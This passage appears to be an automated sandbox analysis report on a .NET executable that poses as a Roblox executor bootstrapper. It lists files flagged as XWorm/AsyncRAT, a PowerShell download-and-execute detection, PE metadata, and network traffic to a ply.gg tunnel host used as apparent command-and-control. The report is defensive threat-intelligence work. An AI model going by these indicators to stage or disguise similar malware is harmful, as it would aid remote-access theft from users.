                                                                                                                                                      SHA-512:9F63CFDB94AF23CEBC85FFD491364C1A90AB90736FC8DA0FE16EBF2FB18E9A6EB8FEA4DFCA87D8353565BA684B0C8F461371588AAC72101B355886619BF672F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....26g.................4..........^S... ...`....@.. ....................................@..................................S..O....`............................................................................... ............... ..H............text...d3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................@S......H........^..........&.....................................................(....*.r...p*. E/..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*. ....*.ry..p*. .X~.*.r...p*. W.0.*.r...p*. *p{.*.r2..p*. ^c{.*..((...*.r...p*. J...*.rv..p*. 9...*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(G...(9...~....o[...&.-.*.r...p*. .n..*.r...p*. ...*.r'..p*.r...p*.rM..p*. .O..*.r...p*..............j..................s\..............*"(I...+.*:.t....(D...+.*

                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.416912722070465
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:scifpi6ceLPL9skLmb0mLSWSPtaJG8nAgex285i2MMhA20X4WABlGuNw5+:Bi58LSWIZBk2MM6AFBmo
                                                                                                                                                      MD5:E3C77FDCDD4EC78CBA5D2C96888C53BE
                                                                                                                                                      SHA1:A92DAE6468D6EA22AE0129EA24A814BE911A367B
                                                                                                                                                      SHA-256:38A22BBA90A435C793EEEC16184F6D1C531F0D13C1875C3DA6303E6D3C7FCAF3
                                                                                                                                                      SHA-512:E451FD16C3319D92F817C745AB3961FC2DC2A79C14297E17A77C3A2E66641044E9E2E33BC66794E7601C7C92414D25EED73EC33523C1B2F2C0883ED87A96002B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Q.b.6..............................................................................................................................................................................................................................................................................................................................................q..V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      \Device\ConDrv

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      File Type:ISO-8859 text, with CRLF, LF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):571
                                                                                                                                                      Entropy (8bit):4.9398118662542965
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                                                                                                                                      MD5:5294778E41EE83E1F1E78B56466AD690
                                                                                                                                                      SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                                                                                                                                      SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                                                                                                                                      SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                      Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):5.216802154727575
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                      File name:8Hd0ZExgJz.exe
                                                                                                                                                      File size:819'200 bytes
                                                                                                                                                      MD5:7198fa10a50ea9aaf6ae5c2a05af2104
                                                                                                                                                      SHA1:c35a2a73313e3c5ad08136e3bc583bb9bc26964c
                                                                                                                                                      SHA256:073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
                                                                                                                                                      SHA512:56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
                                                                                                                                                      SSDEEP:12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0
                                                                                                                                                      TLSH:2905230A4BEE0C7DD77DE73706A0F973996EBA0598F71B2D3169BA7877810884CC0588
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...586g................................. ........@.. ....................... ............@................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x46c3ae
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x67363835 [Thu Nov 14 17:49:41 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6c3580x53.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x500.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000x6a3b40x6a4008c63a4e666bde439a1915d82b13bdf3cFalse0.9885409007352941data7.99421164591081IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x6e0000x5000x600b5405ad108bed587b3871e842cae6fb2False0.3834635416666667data3.8065542020784315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x700000xc0x200c88fbc229bf1ab0ff5ddd3913e93e3d4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_VERSION0x6e0a00x26cdata0.4596774193548387
                                                                                                                                                      RT_MANIFEST0x6e3100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                      Network Behavior

                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-11-14T20:14:06.891834+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703104.21.93.27443TCP

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 14, 2024 20:14:02.072776079 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:02.072873116 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:02.072957993 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:02.078731060 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:02.078771114 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.602607012 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.602678061 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:03.605463982 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:03.605479956 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.605756044 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.652107000 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:03.699337006 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.895078897 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.895137072 CET44349700104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:03.895194054 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:03.910995960 CET49700443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:04.501550913 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                      Nov 14, 2024 20:14:04.506409883 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:04.506484032 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                      Nov 14, 2024 20:14:04.506669044 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                      Nov 14, 2024 20:14:04.511439085 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:05.101888895 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:05.123711109 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                      Nov 14, 2024 20:14:05.935755968 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.935786009 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:05.935854912 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.936151028 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.936167955 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.674789906 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.674910069 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.676518917 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.676532030 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.676948071 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.678622961 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.723329067 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.891834021 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.892086029 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.892211914 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.892829895 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:07.082190990 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082251072 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:07.082313061 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082683086 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082704067 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.042273045 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.045980930 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.062125921 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.062154055 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.062405109 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.073858976 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.115334988 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.573371887 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.573446035 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.576050043 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.576296091 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:10.127506971 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127549887 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.127616882 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127923012 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127943993 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.953311920 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.953387022 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.954920053 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.954940081 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.955178976 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.956182003 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.999362946 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.528934002 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.529007912 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.529078007 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:11.529678106 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:15:02.195482016 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.200509071 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:02.200578928 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.571031094 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.576122999 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:10.816000938 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:10.816093922 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.346348047 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.347829103 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.351497889 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:11.352721930 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:11.352855921 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.367182016 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.372428894 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:19.836595058 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:19.836801052 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:23.315062046 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:23.320013046 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:25.441282988 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.447033882 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:25.447155952 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.472321987 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.477865934 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:33.927252054 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:33.927350998 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:37.824229002 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:37.829109907 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:46.316415071 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.321450949 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:46.324233055 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.346738100 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.351670980 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:54.808082104 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:54.808163881 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.018831015 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.023925066 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:56.023961067 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.028896093 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:56.028995037 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.045828104 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.050796032 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:16:04.511730909 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:16:04.511833906 CET4999926848192.168.2.7147.185.221.23

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 14, 2024 20:14:02.018368959 CET6001653192.168.2.71.1.1.1
                                                                                                                                                      Nov 14, 2024 20:14:02.066468000 CET53600161.1.1.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:04.492880106 CET5390453192.168.2.71.1.1.1
                                                                                                                                                      Nov 14, 2024 20:14:04.501035929 CET53539041.1.1.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:07.069075108 CET5491953192.168.2.71.1.1.1
                                                                                                                                                      Nov 14, 2024 20:14:07.080566883 CET53549191.1.1.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.119338989 CET6147353192.168.2.71.1.1.1
                                                                                                                                                      Nov 14, 2024 20:14:10.126817942 CET53614731.1.1.1192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:02.174741030 CET6477153192.168.2.71.1.1.1
                                                                                                                                                      Nov 14, 2024 20:15:02.191560984 CET53647711.1.1.1192.168.2.7

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Nov 14, 2024 20:14:02.018368959 CET192.168.2.71.1.1.10x64bfStandard query (0)getsolara.devA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:04.492880106 CET192.168.2.71.1.1.10xec31Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:07.069075108 CET192.168.2.71.1.1.10x4274Standard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:10.119338989 CET192.168.2.71.1.1.10x8536Standard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:15:02.174741030 CET192.168.2.71.1.1.10xbea6Standard query (0)23.ip.gl.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Nov 14, 2024 20:14:02.066468000 CET1.1.1.1192.168.2.70x64bfNo error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:02.066468000 CET1.1.1.1192.168.2.70x64bfNo error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:04.501035929 CET1.1.1.1192.168.2.70xec31No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:07.080566883 CET1.1.1.1192.168.2.70x4274No error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:07.080566883 CET1.1.1.1192.168.2.70x4274No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:07.080566883 CET1.1.1.1192.168.2.70x4274No error (0)edge-term4.roblox.comedge-term4-fra2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:07.080566883 CET1.1.1.1192.168.2.70x4274No error (0)edge-term4-fra2.roblox.com128.116.123.3A (IP address)IN (0x0001)false
